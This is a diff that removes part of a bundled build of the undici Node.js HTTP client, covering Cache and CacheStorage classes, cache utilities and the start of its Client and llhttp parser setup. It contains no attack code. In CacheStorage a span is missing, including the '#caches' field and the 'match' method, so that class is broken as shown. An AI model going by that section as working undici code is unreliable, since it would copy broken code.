responsePromise.reject(webidl.errors.exception({ - header: 'Cache.addAll', - message: 'invalid vary field value' - })) - - for (const controller of fetchControllers) { - controller.abort() - } - - return - } - } - } - }, - processResponseEndOfBody (response) { - // 1. - if (response.aborted) { - responsePromise.reject(new DOMException('aborted', 'AbortError')) - return - } - - // 2. - responsePromise.resolve(response) - } - })) - - // 5.8 - responsePromises.push(responsePromise.promise) - } - - // 6. - const p = Promise.all(responsePromises) - - // 7. - const responses = await p - - // 7.1 - const operations = [] - - // 7.2 - let index = 0 - - // 7.3 - for (const response of responses) { - // 7.3.1 - /** @type {CacheBatchOperation} */ - const operation = { - type: 'put', // 7.3.2 - request: requestList[index], // 7.3.3 - response // 7.3.4 - } - - operations.push(operation) // 7.3.5 - - index++ // 7.3.6 - } - - // 7.5 - const cacheJobPromise = createDeferredPromise() - - // 7.6.1 - let errorData = null - - // 7.6.2 - try { - this.#batchCacheOperations(operations) - } catch (e) { - errorData = e - } - - // 7.6.3 - queueMicrotask(() => { - // 7.6.3.1 - if (errorData === null) { - cacheJobPromise.resolve(undefined) - } else { - // 7.6.3.2 - cacheJobPromise.reject(errorData) - } - }) - - // 7.7 - return cacheJobPromise.promise - } - - async put (request, response) { - webidl.brandCheck(this, Cache) - webidl.argumentLengthCheck(arguments, 2, { header: 'Cache.put' }) - - request = webidl.converters.RequestInfo(request) - response = webidl.converters.Response(response) - - // 1. - let innerRequest = null - - // 2. - if (request instanceof Request) { - innerRequest = request[kState] - } else { // 3. - innerRequest = new Request(request)[kState] - } - - // 4. - if (!urlIsHttpHttpsScheme(innerRequest.url) || innerRequest.method !== 'GET') { - throw webidl.errors.exception({ - header: 'Cache.put', - message: 'Expected an http/s scheme when method is not GET' - }) - } - - // 5. - const innerResponse = response[kState] - - // 6. - if (innerResponse.status === 206) { - throw webidl.errors.exception({ - header: 'Cache.put', - message: 'Got 206 status' - }) - } - - // 7. - if (innerResponse.headersList.contains('vary')) { - // 7.1. - const fieldValues = getFieldValues(innerResponse.headersList.get('vary')) - - // 7.2. - for (const fieldValue of fieldValues) { - // 7.2.1 - if (fieldValue === '*') { - throw webidl.errors.exception({ - header: 'Cache.put', - message: 'Got * vary field value' - }) - } - } - } - - // 8. - if (innerResponse.body && (isDisturbed(innerResponse.body.stream) || innerResponse.body.stream.locked)) { - throw webidl.errors.exception({ - header: 'Cache.put', - message: 'Response body is locked or disturbed' - }) - } - - // 9. - const clonedResponse = cloneResponse(innerResponse) - - // 10. - const bodyReadPromise = createDeferredPromise() - - // 11. - if (innerResponse.body != null) { - // 11.1 - const stream = innerResponse.body.stream - - // 11.2 - const reader = stream.getReader() - - // 11.3 - readAllBytes(reader).then(bodyReadPromise.resolve, bodyReadPromise.reject) - } else { - bodyReadPromise.resolve(undefined) - } - - // 12. - /** @type {CacheBatchOperation[]} */ - const operations = [] - - // 13. - /** @type {CacheBatchOperation} */ - const operation = { - type: 'put', // 14. - request: innerRequest, // 15. - response: clonedResponse // 16. - } - - // 17. - operations.push(operation) - - // 19. - const bytes = await bodyReadPromise.promise - - if (clonedResponse.body != null) { - clonedResponse.body.source = bytes - } - - // 19.1 - const cacheJobPromise = createDeferredPromise() - - // 19.2.1 - let errorData = null - - // 19.2.2 - try { - this.#batchCacheOperations(operations) - } catch (e) { - errorData = e - } - - // 19.2.3 - queueMicrotask(() => { - // 19.2.3.1 - if (errorData === null) { - cacheJobPromise.resolve() - } else { // 19.2.3.2 - cacheJobPromise.reject(errorData) - } - }) - - return cacheJobPromise.promise - } - - async delete (request, options = {}) { - webidl.brandCheck(this, Cache) - webidl.argumentLengthCheck(arguments, 1, { header: 'Cache.delete' }) - - request = webidl.converters.RequestInfo(request) - options = webidl.converters.CacheQueryOptions(options) - - /** - * @type {Request} - */ - let r = null - - if (request instanceof Request) { - r = request[kState] - - if (r.method !== 'GET' && !options.ignoreMethod) { - return false - } - } else { - assert(typeof request === 'string') - - r = new Request(request)[kState] - } - - /** @type {CacheBatchOperation[]} */ - const operations = [] - - /** @type {CacheBatchOperation} */ - const operation = { - type: 'delete', - request: r, - options - } - - operations.push(operation) - - const cacheJobPromise = createDeferredPromise() - - let errorData = null - let requestResponses - - try { - requestResponses = this.#batchCacheOperations(operations) - } catch (e) { - errorData = e - } - - queueMicrotask(() => { - if (errorData === null) { - cacheJobPromise.resolve(!!requestResponses?.length) - } else { - cacheJobPromise.reject(errorData) - } - }) - - return cacheJobPromise.promise - } - - /** - * @see https://w3c.github.io/ServiceWorker/#dom-cache-keys - * @param {any} request - * @param {import('../../types/cache').CacheQueryOptions} options - * @returns {readonly Request[]} - */ - async keys (request = undefined, options = {}) { - webidl.brandCheck(this, Cache) - - if (request !== undefined) request = webidl.converters.RequestInfo(request) - options = webidl.converters.CacheQueryOptions(options) - - // 1. - let r = null - - // 2. - if (request !== undefined) { - // 2.1 - if (request instanceof Request) { - // 2.1.1 - r = request[kState] - - // 2.1.2 - if (r.method !== 'GET' && !options.ignoreMethod) { - return [] - } - } else if (typeof request === 'string') { // 2.2 - r = new Request(request)[kState] - } - } - - // 4. - const promise = createDeferredPromise() - - // 5. - // 5.1 - const requests = [] - - // 5.2 - if (request === undefined) { - // 5.2.1 - for (const requestResponse of this.#relevantRequestResponseList) { - // 5.2.1.1 - requests.push(requestResponse[0]) - } - } else { // 5.3 - // 5.3.1 - const requestResponses = this.#queryCache(r, options) - - // 5.3.2 - for (const requestResponse of requestResponses) { - // 5.3.2.1 - requests.push(requestResponse[0]) - } - } - - // 5.4 - queueMicrotask(() => { - // 5.4.1 - const requestList = [] - - // 5.4.2 - for (const request of requests) { - const requestObject = new Request('https://a') - requestObject[kState] = request - requestObject[kHeaders][kHeadersList] = request.headersList - requestObject[kHeaders][kGuard] = 'immutable' - requestObject[kRealm] = request.client - - // 5.4.2.1 - requestList.push(requestObject) - } - - // 5.4.3 - promise.resolve(Object.freeze(requestList)) - }) - - return promise.promise - } - - /** - * @see https://w3c.github.io/ServiceWorker/#batch-cache-operations-algorithm - * @param {CacheBatchOperation[]} operations - * @returns {requestResponseList} - */ - #batchCacheOperations (operations) { - // 1. - const cache = this.#relevantRequestResponseList - - // 2. - const backupCache = [...cache] - - // 3. - const addedItems = [] - - // 4.1 - const resultList = [] - - try { - // 4.2 - for (const operation of operations) { - // 4.2.1 - if (operation.type !== 'delete' && operation.type !== 'put') { - throw webidl.errors.exception({ - header: 'Cache.#batchCacheOperations', - message: 'operation type does not match "delete" or "put"' - }) - } - - // 4.2.2 - if (operation.type === 'delete' && operation.response != null) { - throw webidl.errors.exception({ - header: 'Cache.#batchCacheOperations', - message: 'delete operation should not have an associated response' - }) - } - - // 4.2.3 - if (this.#queryCache(operation.request, operation.options, addedItems).length) { - throw new DOMException('???', 'InvalidStateError') - } - - // 4.2.4 - let requestResponses - - // 4.2.5 - if (operation.type === 'delete') { - // 4.2.5.1 - requestResponses = this.#queryCache(operation.request, operation.options) - - // TODO: the spec is wrong, this is needed to pass WPTs - if (requestResponses.length === 0) { - return [] - } - - // 4.2.5.2 - for (const requestResponse of requestResponses) { - const idx = cache.indexOf(requestResponse) - assert(idx !== -1) - - // 4.2.5.2.1 - cache.splice(idx, 1) - } - } else if (operation.type === 'put') { // 4.2.6 - // 4.2.6.1 - if (operation.response == null) { - throw webidl.errors.exception({ - header: 'Cache.#batchCacheOperations', - message: 'put operation should have an associated response' - }) - } - - // 4.2.6.2 - const r = operation.request - - // 4.2.6.3 - if (!urlIsHttpHttpsScheme(r.url)) { - throw webidl.errors.exception({ - header: 'Cache.#batchCacheOperations', - message: 'expected http or https scheme' - }) - } - - // 4.2.6.4 - if (r.method !== 'GET') { - throw webidl.errors.exception({ - header: 'Cache.#batchCacheOperations', - message: 'not get method' - }) - } - - // 4.2.6.5 - if (operation.options != null) { - throw webidl.errors.exception({ - header: 'Cache.#batchCacheOperations', - message: 'options must not be defined' - }) - } - - // 4.2.6.6 - requestResponses = this.#queryCache(operation.request) - - // 4.2.6.7 - for (const requestResponse of requestResponses) { - const idx = cache.indexOf(requestResponse) - assert(idx !== -1) - - // 4.2.6.7.1 - cache.splice(idx, 1) - } - - // 4.2.6.8 - cache.push([operation.request, operation.response]) - - // 4.2.6.10 - addedItems.push([operation.request, operation.response]) - } - - // 4.2.7 - resultList.push([operation.request, operation.response]) - } - - // 4.3 - return resultList - } catch (e) { // 5. - // 5.1 - this.#relevantRequestResponseList.length = 0 - - // 5.2 - this.#relevantRequestResponseList = backupCache - - // 5.3 - throw e - } - } - - /** - * @see https://w3c.github.io/ServiceWorker/#query-cache - * @param {any} requestQuery - * @param {import('../../types/cache').CacheQueryOptions} options - * @param {requestResponseList} targetStorage - * @returns {requestResponseList} - */ - #queryCache (requestQuery, options, targetStorage) { - /** @type {requestResponseList} */ - const resultList = [] - - const storage = targetStorage ?? this.#relevantRequestResponseList - - for (const requestResponse of storage) { - const [cachedRequest, cachedResponse] = requestResponse - if (this.#requestMatchesCachedItem(requestQuery, cachedRequest, cachedResponse, options)) { - resultList.push(requestResponse) - } - } - - return resultList - } - - /** - * @see https://w3c.github.io/ServiceWorker/#request-matches-cached-item-algorithm - * @param {any} requestQuery - * @param {any} request - * @param {any | null} response - * @param {import('../../types/cache').CacheQueryOptions | undefined} options - * @returns {boolean} - */ - #requestMatchesCachedItem (requestQuery, request, response = null, options) { - // if (options?.ignoreMethod === false && request.method === 'GET') { - // return false - // } - - const queryURL = new URL(requestQuery.url) - - const cachedURL = new URL(request.url) - - if (options?.ignoreSearch) { - cachedURL.search = '' - - queryURL.search = '' - } - - if (!urlEquals(queryURL, cachedURL, true)) { - return false - } - - if ( - response == null || - options?.ignoreVary || - !response.headersList.contains('vary') - ) { - return true - } - - const fieldValues = getFieldValues(response.headersList.get('vary')) - - for (const fieldValue of fieldValues) { - if (fieldValue === '*') { - return false - } - - const requestValue = request.headersList.get(fieldValue) - const queryValue = requestQuery.headersList.get(fieldValue) - - // If one has the header and the other doesn't, or one has - // a different value than the other, return false - if (requestValue !== queryValue) { - return false - } - } - - return true - } -} - -Object.defineProperties(Cache.prototype, { - [Symbol.toStringTag]: { - value: 'Cache', - configurable: true - }, - match: kEnumerableProperty, - matchAll: kEnumerableProperty, - add: kEnumerableProperty, - addAll: kEnumerableProperty, - put: kEnumerableProperty, - delete: kEnumerableProperty, - keys: kEnumerableProperty -}) - -const cacheQueryOptionConverters = [ - { - key: 'ignoreSearch', - converter: webidl.converters.boolean, - defaultValue: false - }, - { - key: 'ignoreMethod', - converter: webidl.converters.boolean, - defaultValue: false - }, - { - key: 'ignoreVary', - converter: webidl.converters.boolean, - defaultValue: false - } -] - -webidl.converters.CacheQueryOptions = webidl.dictionaryConverter(cacheQueryOptionConverters) - -webidl.converters.MultiCacheQueryOptions = webidl.dictionaryConverter([ - ...cacheQueryOptionConverters, - { - key: 'cacheName', - converter: webidl.converters.DOMString - } -]) - -webidl.converters.Response = webidl.interfaceConverter(Response) - -webidl.converters['sequence'] = webidl.sequenceConverter( - webidl.converters.RequestInfo -) - -module.exports = { - Cache -} - - -/***/ }), - -/***/ 7907: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { kConstruct } = __nccwpck_require__(9174) -const { Cache } = __nccwpck_require__(6101) -const { webidl } = __nccwpck_require__(1744) -const { kEnumerableProperty } = __nccwpck_require__(3983) - -class CacheStorage { - /** - * @see https://w3c.github.io/ServiceWorker/#dfn-relevant-name-to-cache-map - * @type {Map} - */ - async has (cacheName) { - webidl.brandCheck(this, CacheStorage) - webidl.argumentLengthCheck(arguments, 1, { header: 'CacheStorage.has' }) - - cacheName = webidl.converters.DOMString(cacheName) - - // 2.1.1 - // 2.2 - return this.#caches.has(cacheName) - } - - /** - * @see https://w3c.github.io/ServiceWorker/#dom-cachestorage-open - * @param {string} cacheName - * @returns {Promise} - */ - async open (cacheName) { - webidl.brandCheck(this, CacheStorage) - webidl.argumentLengthCheck(arguments, 1, { header: 'CacheStorage.open' }) - - cacheName = webidl.converters.DOMString(cacheName) - - // 2.1 - if (this.#caches.has(cacheName)) { - // await caches.open('v1') !== await caches.open('v1') - - // 2.1.1 - const cache = this.#caches.get(cacheName) - - // 2.1.1.1 - return new Cache(kConstruct, cache) - } - - // 2.2 - const cache = [] - - // 2.3 - this.#caches.set(cacheName, cache) - - // 2.4 - return new Cache(kConstruct, cache) - } - - /** - * @see https://w3c.github.io/ServiceWorker/#cache-storage-delete - * @param {string} cacheName - * @returns {Promise} - */ - async delete (cacheName) { - webidl.brandCheck(this, CacheStorage) - webidl.argumentLengthCheck(arguments, 1, { header: 'CacheStorage.delete' }) - - cacheName = webidl.converters.DOMString(cacheName) - - return this.#caches.delete(cacheName) - } - - /** - * @see https://w3c.github.io/ServiceWorker/#cache-storage-keys - * @returns {string[]} - */ - async keys () { - webidl.brandCheck(this, CacheStorage) - - // 2.1 - const keys = this.#caches.keys() - - // 2.2 - return [...keys] - } -} - -Object.defineProperties(CacheStorage.prototype, { - [Symbol.toStringTag]: { - value: 'CacheStorage', - configurable: true - }, - match: kEnumerableProperty, - has: kEnumerableProperty, - open: kEnumerableProperty, - delete: kEnumerableProperty, - keys: kEnumerableProperty -}) - -module.exports = { - CacheStorage -} - - -/***/ }), - -/***/ 9174: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -module.exports = { - kConstruct: (__nccwpck_require__(2785).kConstruct) -} - - -/***/ }), - -/***/ 2396: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const assert = __nccwpck_require__(9491) -const { URLSerializer } = __nccwpck_require__(685) -const { isValidHeaderName } = __nccwpck_require__(2538) - -/** - * @see https://url.spec.whatwg.org/#concept-url-equals - * @param {URL} A - * @param {URL} B - * @param {boolean | undefined} excludeFragment - * @returns {boolean} - */ -function urlEquals (A, B, excludeFragment = false) { - const serializedA = URLSerializer(A, excludeFragment) - - const serializedB = URLSerializer(B, excludeFragment) - - return serializedA === serializedB -} - -/** - * @see https://github.com/chromium/chromium/blob/694d20d134cb553d8d89e5500b9148012b1ba299/content/browser/cache_storage/cache_storage_cache.cc#L260-L262 - * @param {string} header - */ -function fieldValues (header) { - assert(header !== null) - - const values = [] - - for (let value of header.split(',')) { - value = value.trim() - - if (!value.length) { - continue - } else if (!isValidHeaderName(value)) { - continue - } - - values.push(value) - } - - return values -} - -module.exports = { - urlEquals, - fieldValues -} - - -/***/ }), - -/***/ 3598: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; -// @ts-check - - - -/* global WebAssembly */ - -const assert = __nccwpck_require__(9491) -const net = __nccwpck_require__(1808) -const http = __nccwpck_require__(3685) -const { pipeline } = __nccwpck_require__(2781) -const util = __nccwpck_require__(3983) -const timers = __nccwpck_require__(9459) -const Request = __nccwpck_require__(2905) -const DispatcherBase = __nccwpck_require__(4839) -const { - RequestContentLengthMismatchError, - ResponseContentLengthMismatchError, - InvalidArgumentError, - RequestAbortedError, - HeadersTimeoutError, - HeadersOverflowError, - SocketError, - InformationalError, - BodyTimeoutError, - HTTPParserError, - ResponseExceededMaxSizeError, - ClientDestroyedError -} = __nccwpck_require__(8045) -const buildConnector = __nccwpck_require__(2067) -const { - kUrl, - kReset, - kServerName, - kClient, - kBusy, - kParser, - kConnect, - kBlocking, - kResuming, - kRunning, - kPending, - kSize, - kWriting, - kQueue, - kConnected, - kConnecting, - kNeedDrain, - kNoRef, - kKeepAliveDefaultTimeout, - kHostHeader, - kPendingIdx, - kRunningIdx, - kError, - kPipelining, - kSocket, - kKeepAliveTimeoutValue, - kMaxHeadersSize, - kKeepAliveMaxTimeout, - kKeepAliveTimeoutThreshold, - kHeadersTimeout, - kBodyTimeout, - kStrictContentLength, - kConnector, - kMaxRedirections, - kMaxRequests, - kCounter, - kClose, - kDestroy, - kDispatch, - kInterceptors, - kLocalAddress, - kMaxResponseSize, - kHTTPConnVersion, - // HTTP2 - kHost, - kHTTP2Session, - kHTTP2SessionState, - kHTTP2BuildRequest, - kHTTP2CopyHeaders, - kHTTP1BuildRequest -} = __nccwpck_require__(2785) - -/** @type {import('http2')} */ -let http2 -try { - http2 = __nccwpck_require__(5158) -} catch { - // @ts-ignore - http2 = { constants: {} } -} - -const { - constants: { - HTTP2_HEADER_AUTHORITY, - HTTP2_HEADER_METHOD, - HTTP2_HEADER_PATH, - HTTP2_HEADER_SCHEME, - HTTP2_HEADER_CONTENT_LENGTH, - HTTP2_HEADER_EXPECT, - HTTP2_HEADER_STATUS - } -} = http2 - -// Experimental -let h2ExperimentalWarned = false - -const FastBuffer = Buffer[Symbol.species] - -const kClosedResolve = Symbol('kClosedResolve') - -const channels = {} - -try { - const diagnosticsChannel = __nccwpck_require__(7643) - channels.sendHeaders = diagnosticsChannel.channel('undici:client:sendHeaders') - channels.beforeConnect = diagnosticsChannel.channel('undici:client:beforeConnect') - channels.connectError = diagnosticsChannel.channel('undici:client:connectError') - channels.connected = diagnosticsChannel.channel('undici:client:connected') -} catch { - channels.sendHeaders = { hasSubscribers: false } - channels.beforeConnect = { hasSubscribers: false } - channels.connectError = { hasSubscribers: false } - channels.connected = { hasSubscribers: false } -} - -/** - * @type {import('../types/client').default} - */ -class Client extends DispatcherBase { - /** - * - * @param {string|URL} url - * @param {import('../types/client').Client.Options} options - */ - constructor (url, { - interceptors, - maxHeaderSize, - headersTimeout, - socketTimeout, - requestTimeout, - connectTimeout, - bodyTimeout, - idleTimeout, - keepAlive, - keepAliveTimeout, - maxKeepAliveTimeout, - keepAliveMaxTimeout, - keepAliveTimeoutThreshold, - socketPath, - pipelining, - tls, - strictContentLength, - maxCachedSessions, - maxRedirections, - connect, - maxRequestsPerClient, - localAddress, - maxResponseSize, - autoSelectFamily, - autoSelectFamilyAttemptTimeout, - // h2 - allowH2, - maxConcurrentStreams - } = {}) { - super() - - if (keepAlive !== undefined) { - throw new InvalidArgumentError('unsupported keepAlive, use pipelining=0 instead') - } - - if (socketTimeout !== undefined) { - throw new InvalidArgumentError('unsupported socketTimeout, use headersTimeout & bodyTimeout instead') - } - - if (requestTimeout !== undefined) { - throw new InvalidArgumentError('unsupported requestTimeout, use headersTimeout & bodyTimeout instead') - } - - if (idleTimeout !== undefined) { - throw new InvalidArgumentError('unsupported idleTimeout, use keepAliveTimeout instead') - } - - if (maxKeepAliveTimeout !== undefined) { - throw new InvalidArgumentError('unsupported maxKeepAliveTimeout, use keepAliveMaxTimeout instead') - } - - if (maxHeaderSize != null && !Number.isFinite(maxHeaderSize)) { - throw new InvalidArgumentError('invalid maxHeaderSize') - } - - if (socketPath != null && typeof socketPath !== 'string') { - throw new InvalidArgumentError('invalid socketPath') - } - - if (connectTimeout != null && (!Number.isFinite(connectTimeout) || connectTimeout < 0)) { - throw new InvalidArgumentError('invalid connectTimeout') - } - - if (keepAliveTimeout != null && (!Number.isFinite(keepAliveTimeout) || keepAliveTimeout <= 0)) { - throw new InvalidArgumentError('invalid keepAliveTimeout') - } - - if (keepAliveMaxTimeout != null && (!Number.isFinite(keepAliveMaxTimeout) || keepAliveMaxTimeout <= 0)) { - throw new InvalidArgumentError('invalid keepAliveMaxTimeout') - } - - if (keepAliveTimeoutThreshold != null && !Number.isFinite(keepAliveTimeoutThreshold)) { - throw new InvalidArgumentError('invalid keepAliveTimeoutThreshold') - } - - if (headersTimeout != null && (!Number.isInteger(headersTimeout) || headersTimeout < 0)) { - throw new InvalidArgumentError('headersTimeout must be a positive integer or zero') - } - - if (bodyTimeout != null && (!Number.isInteger(bodyTimeout) || bodyTimeout < 0)) { - throw new InvalidArgumentError('bodyTimeout must be a positive integer or zero') - } - - if (connect != null && typeof connect !== 'function' && typeof connect !== 'object') { - throw new InvalidArgumentError('connect must be a function or an object') - } - - if (maxRedirections != null && (!Number.isInteger(maxRedirections) || maxRedirections < 0)) { - throw new InvalidArgumentError('maxRedirections must be a positive number') - } - - if (maxRequestsPerClient != null && (!Number.isInteger(maxRequestsPerClient) || maxRequestsPerClient < 0)) { - throw new InvalidArgumentError('maxRequestsPerClient must be a positive number') - } - - if (localAddress != null && (typeof localAddress !== 'string' || net.isIP(localAddress) === 0)) { - throw new InvalidArgumentError('localAddress must be valid string IP address') - } - - if (maxResponseSize != null && (!Number.isInteger(maxResponseSize) || maxResponseSize < -1)) { - throw new InvalidArgumentError('maxResponseSize must be a positive number') - } - - if ( - autoSelectFamilyAttemptTimeout != null && - (!Number.isInteger(autoSelectFamilyAttemptTimeout) || autoSelectFamilyAttemptTimeout < -1) - ) { - throw new InvalidArgumentError('autoSelectFamilyAttemptTimeout must be a positive number') - } - - // h2 - if (allowH2 != null && typeof allowH2 !== 'boolean') { - throw new InvalidArgumentError('allowH2 must be a valid boolean value') - } - - if (maxConcurrentStreams != null && (typeof maxConcurrentStreams !== 'number' || maxConcurrentStreams < 1)) { - throw new InvalidArgumentError('maxConcurrentStreams must be a possitive integer, greater than 0') - } - - if (typeof connect !== 'function') { - connect = buildConnector({ - ...tls, - maxCachedSessions, - allowH2, - socketPath, - timeout: connectTimeout, - ...(util.nodeHasAutoSelectFamily && autoSelectFamily ? { autoSelectFamily, autoSelectFamilyAttemptTimeout } : undefined), - ...connect - }) - } - - this[kInterceptors] = interceptors && interceptors.Client && Array.isArray(interceptors.Client) - ? interceptors.Client - : [createRedirectInterceptor({ maxRedirections })] - this[kUrl] = util.parseOrigin(url) - this[kConnector] = connect - this[kSocket] = null - this[kPipelining] = pipelining != null ? pipelining : 1 - this[kMaxHeadersSize] = maxHeaderSize || http.maxHeaderSize - this[kKeepAliveDefaultTimeout] = keepAliveTimeout == null ? 4e3 : keepAliveTimeout - this[kKeepAliveMaxTimeout] = keepAliveMaxTimeout == null ? 600e3 : keepAliveMaxTimeout - this[kKeepAliveTimeoutThreshold] = keepAliveTimeoutThreshold == null ? 1e3 : keepAliveTimeoutThreshold - this[kKeepAliveTimeoutValue] = this[kKeepAliveDefaultTimeout] - this[kServerName] = null - this[kLocalAddress] = localAddress != null ? localAddress : null - this[kResuming] = 0 // 0, idle, 1, scheduled, 2 resuming - this[kNeedDrain] = 0 // 0, idle, 1, scheduled, 2 resuming - this[kHostHeader] = `host: ${this[kUrl].hostname}${this[kUrl].port ? `:${this[kUrl].port}` : ''}\r\n` - this[kBodyTimeout] = bodyTimeout != null ? bodyTimeout : 300e3 - this[kHeadersTimeout] = headersTimeout != null ? headersTimeout : 300e3 - this[kStrictContentLength] = strictContentLength == null ? true : strictContentLength - this[kMaxRedirections] = maxRedirections - this[kMaxRequests] = maxRequestsPerClient - this[kClosedResolve] = null - this[kMaxResponseSize] = maxResponseSize > -1 ? maxResponseSize : -1 - this[kHTTPConnVersion] = 'h1' - - // HTTP/2 - this[kHTTP2Session] = null - this[kHTTP2SessionState] = !allowH2 - ? null - : { - // streams: null, // Fixed queue of streams - For future support of `push` - openStreams: 0, // Keep track of them to decide wether or not unref the session - maxConcurrentStreams: maxConcurrentStreams != null ? maxConcurrentStreams : 100 // Max peerConcurrentStreams for a Node h2 server - } - this[kHost] = `${this[kUrl].hostname}${this[kUrl].port ? `:${this[kUrl].port}` : ''}` - - // kQueue is built up of 3 sections separated by - // the kRunningIdx and kPendingIdx indices. - // | complete | running | pending | - // ^ kRunningIdx ^ kPendingIdx ^ kQueue.length - // kRunningIdx points to the first running element. - // kPendingIdx points to the first pending element. - // This implements a fast queue with an amortized - // time of O(1). - - this[kQueue] = [] - this[kRunningIdx] = 0 - this[kPendingIdx] = 0 - } - - get pipelining () { - return this[kPipelining] - } - - set pipelining (value) { - this[kPipelining] = value - resume(this, true) - } - - get [kPending] () { - return this[kQueue].length - this[kPendingIdx] - } - - get [kRunning] () { - return this[kPendingIdx] - this[kRunningIdx] - } - - get [kSize] () { - return this[kQueue].length - this[kRunningIdx] - } - - get [kConnected] () { - return !!this[kSocket] && !this[kConnecting] && !this[kSocket].destroyed - } - - get [kBusy] () { - const socket = this[kSocket] - return ( - (socket && (socket[kReset] || socket[kWriting] || socket[kBlocking])) || - (this[kSize] >= (this[kPipelining] || 1)) || - this[kPending] > 0 - ) - } - - /* istanbul ignore: only used for test */ - [kConnect] (cb) { - connect(this) - this.once('connect', cb) - } - - [kDispatch] (opts, handler) { - const origin = opts.origin || this[kUrl].origin - - const request = this[kHTTPConnVersion] === 'h2' - ? Request[kHTTP2BuildRequest](origin, opts, handler) - : Request[kHTTP1BuildRequest](origin, opts, handler) - - this[kQueue].push(request) - if (this[kResuming]) { - // Do nothing. - } else if (util.bodyLength(request.body) == null && util.isIterable(request.body)) { - // Wait a tick in case stream/iterator is ended in the same tick. - this[kResuming] = 1 - process.nextTick(resume, this) - } else { - resume(this, true) - } - - if (this[kResuming] && this[kNeedDrain] !== 2 && this[kBusy]) { - this[kNeedDrain] = 2 - } - - return this[kNeedDrain] < 2 - } - - async [kClose] () { - // TODO: for H2 we need to gracefully flush the remaining enqueued - // request and close each stream. - return new Promise((resolve) => { - if (!this[kSize]) { - resolve(null) - } else { - this[kClosedResolve] = resolve - } - }) - } - - async [kDestroy] (err) { - return new Promise((resolve) => { - const requests = this[kQueue].splice(this[kPendingIdx]) - for (let i = 0; i < requests.length; i++) { - const request = requests[i] - errorRequest(this, request, err) - } - - const callback = () => { - if (this[kClosedResolve]) { - // TODO (fix): Should we error here with ClientDestroyedError? - this[kClosedResolve]() - this[kClosedResolve] = null - } - resolve() - } - - if (this[kHTTP2Session] != null) { - util.destroy(this[kHTTP2Session], err) - this[kHTTP2Session] = null - this[kHTTP2SessionState] = null - } - - if (!this[kSocket]) { - queueMicrotask(callback) - } else { - util.destroy(this[kSocket].on('close', callback), err) - } - - resume(this) - }) - } -} - -function onHttp2SessionError (err) { - assert(err.code !== 'ERR_TLS_CERT_ALTNAME_INVALID') - - this[kSocket][kError] = err - - onError(this[kClient], err) -} - -function onHttp2FrameError (type, code, id) { - const err = new InformationalError(`HTTP/2: "frameError" received - type ${type}, code ${code}`) - - if (id === 0) { - this[kSocket][kError] = err - onError(this[kClient], err) - } -} - -function onHttp2SessionEnd () { - util.destroy(this, new SocketError('other side closed')) - util.destroy(this[kSocket], new SocketError('other side closed')) -} - -function onHTTP2GoAway (code) { - const client = this[kClient] - const err = new InformationalError(`HTTP/2: "GOAWAY" frame received with code ${code}`) - client[kSocket] = null - client[kHTTP2Session] = null - - if (client.destroyed) { - assert(this[kPending] === 0) - - // Fail entire queue. - const requests = client[kQueue].splice(client[kRunningIdx]) - for (let i = 0; i < requests.length; i++) { - const request = requests[i] - errorRequest(this, request, err) - } - } else if (client[kRunning] > 0) { - // Fail head of pipeline. - const request = client[kQueue][client[kRunningIdx]] - client[kQueue][client[kRunningIdx]++] = null - - errorRequest(client, request, err) - } - - client[kPendingIdx] = client[kRunningIdx] - - assert(client[kRunning] === 0) - - client.emit('disconnect', - client[kUrl], - [client], - err - ) - - resume(client) -} - -const constants = __nccwpck_require__(953) -const createRedirectInterceptor = __nccwpck_require__(8861) -const EMPTY_BUF = Buffer.alloc(0) - -async function lazyllhttp () { - const llhttpWasmData = process.env.JEST_WORKER_ID ? __nccwpck_require__(1145) : undefined - - let mod - try { - mod = await WebAssembly.compile(Buffer.from(__nccwpck_require__(5627), 'base64')) - } catch (e) { - /* istanbul ignore next */ - - // We could check if the error was caused by the simd option not - // being enabled, but the occurring of this other error - // * https://github.com/emscripten-core/emscripten/issues/11495 - // got me to remove that check to avoid breaking Node 12. - mod = await WebAssembly.compile(Buffer.from(llhttpWasmData || __nccwpck_require__(1145), 'base64')) - } - - return await WebAssembly.instantiate(mod, { - env: { - /* eslint-disable camelcase */ - - wasm_on_url: (p, at, len) => { - /* istanbul ignore next */ - return 0 - }, - wasm_on_status: (p, at, len) => { - assert.strictEqual(currentParser.ptr, p) - const start = at - currentBufferPtr + currentBufferRef.byteOffset - return currentParser.onStatus(new FastBuffer(currentBufferRef.buffer, start, len)) || 0 - }, - wasm_on_message_begin: (p) => { - assert.strictEqual(currentParser.ptr, p) - return currentParser.onMessageBegin() || 0 - }, - wasm_on_header_field: (p, at, len) => { - assert.strictEqual(currentParser.ptr, p) - const start = at - currentBufferPtr + currentBufferRef.byteOffset - return currentParser.onHeaderField(new FastBuffer(currentBufferRef.buffer, start, len)) || 0 - }, - wasm_on_header_value: (p, at, len) => { - assert.strictEqual(currentParser.ptr, p) - const start = at - currentBufferPtr + currentBufferRef.byteOffset - return currentParser.onHeaderValue(new FastBuffer(currentBufferRef.buffer, start, len)) || 0 - }, - wasm_on_headers_complete: (p, statusCode, upgrade, shouldKeepAlive) => { - assert.strictEqual(currentParser.ptr, p) - return currentParser.onHeadersComplete(statusCode, Boolean(upgrade), Boolean(shouldKeepAlive)) || 0 - }, - wasm_on_body: (p, at, len) => { - assert.strictEqual(currentParser.ptr, p) - const start = at - currentBufferPtr + currentBufferRef.byteOffset - return currentParser.onBody(new FastBuffer(currentBufferRef.buffer, start, len)) || 0 - }, - wasm_on_message_complete: (p) => { - assert.strictEqual(currentParser.ptr, p) - return currentParser.onMessageComplete() || 0 - } - - /* eslint-enable camelcase */ - } - }) -} - -let llhttpInstance = null -let llhttpPromise = lazyllhttp() -llhttpPromise.catch() - -let currentParser = null -let currentBufferRef = null -let currentBufferSize = 0 -let currentBufferPtr = null - -const TIMEOUT_HEADERS = 1 -const TIMEOUT_BODY = 2 -const TIMEOUT_IDLE = 3 - -class Parser { - constructor (client, socket, { exports }) { - assert(Number.isFinite(client[kMaxHeadersSize]) && client[kMaxHeadersSize] > 0) - - this.llhttp = exports - this.ptr = this.llhttp.llhttp_alloc(constants.TYPE.RESPONSE) - this.client = client - this.socket = socket - this.timeout = null - this.timeoutValue = null - this.timeoutType = null - this.statusCode = null - this.statusText = '' - this.upgrade = false - this.headers = [] - 